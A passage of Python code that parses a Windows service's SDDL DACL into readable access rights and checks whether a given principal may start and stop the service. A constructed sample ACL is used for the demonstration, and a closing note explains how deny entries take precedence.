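# Service-specific access rights, the same values as the ServiceAccessFlags enum above.
SERVICE_RIGHTS = {
    "QueryConfig": 0x0001, "ChangeConfig": 0x0002, "QueryStatus": 0x0004,
    "EnumerateDependents": 0x0008, "Start": 0x0010, "Stop": 0x0020,
    "PauseContinue": 0x0040, "Interrogate": 0x0080, "UserDefinedControl": 0x0100,
    "Delete": 0x10000, "ReadControl": 0x20000, "WriteDac": 0x40000,
    "WriteOwner": 0x80000, "GenericAll": 0x10000000,
}

# SDDL two-letter rights codes. For service objects the object-specific codes
# CC..CR land on the low nine bits, i.e. RP = SERVICE_START and WP = SERVICE_STOP.
SDDL_RIGHTS = {
    "CC": 0x0001, "DC": 0x0002, "LC": 0x0004, "SW": 0x0008, "RP": 0x0010,
    "WP": 0x0020, "DT": 0x0040, "LO": 0x0080, "CR": 0x0100,
    "SD": 0x10000, "RC": 0x20000, "WD": 0x40000, "WO": 0x80000, "GA": 0x10000000,
}

# Well-known SID abbreviations that commonly appear in service DACLs.
WELL_KNOWN_SIDS = {
    "SY": "NT AUTHORITY\\SYSTEM", "BA": "BUILTIN\\Administrators",
    "IU": "NT AUTHORITY\\INTERACTIVE", "SU": "NT AUTHORITY\\SERVICE",
    "AU": "NT AUTHORITY\\Authenticated Users", "BU": "BUILTIN\\Users",
    "WD": "Everyone",
}

# (ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid)
ACE_RE = re.compile(r"\((\w+);(\w*);([A-Z]*);;;([^)]+)\)")


def parse_sddl_dacl(sddl: str):
    """Return [(ace_type, principal, access_mask), ...] for the D: part of an SDDL string."""
    dacl = sddl.split("D:", 1)[1]
    if "S:" in dacl:                      # drop the SACL, if sdshow included one
        dacl = dacl.split("S:", 1)[0]
    aces = []
    for ace_type, _flags, rights, sid in ACE_RE.findall(dacl):
        mask = 0
        for i in range(0, len(rights), 2):
            mask |= SDDL_RIGHTS[rights[i:i + 2]]
        aces.append((ace_type, WELL_KNOWN_SIDS.get(sid, sid), mask))
    return aces


def rights_names(mask: int):
    """Human-readable names for the bits set in a service access mask."""
    return sorted(name for name, bit in SERVICE_RIGHTS.items() if mask & bit)


def can_restart(aces, principal: str) -> bool:
    """True when `principal` is allowed both SERVICE_START and SERVICE_STOP
    (GenericAll counts) and no deny ACE removes either of them."""
    need = SERVICE_RIGHTS["Start"] | SERVICE_RIGHTS["Stop"]
    allowed = denied = 0
    for ace_type, who, mask in aces:
        if who != principal:
            continue
        if mask & SERVICE_RIGHTS["GenericAll"]:
            mask |= need
        if ace_type == "A":
            allowed |= mask
        elif ace_type == "D":
            denied |= mask
    return ((allowed & ~denied) & need) == need


if __name__ == "__main__":
    # Constructed sample, not the real nscp ACL: INTERACTIVE is given RP/WP here on purpose.
    sample = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
              "(A;;CCLCSWRPWPLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)")
    aces = parse_sddl_dacl(sample)
    for ace_type, who, mask in aces:
        print(f"{ace_type} {who:36s} {', '.join(rights_names(mask))}")
    print("INTERACTIVE can restart:", can_restart(aces, "NT AUTHORITY\\INTERACTIVE"))
```

Deny ACEs are honoured because the Windows access check evaluates them before allows; a DACL that grants RPWP to a group and denies WP to the user still means no restart.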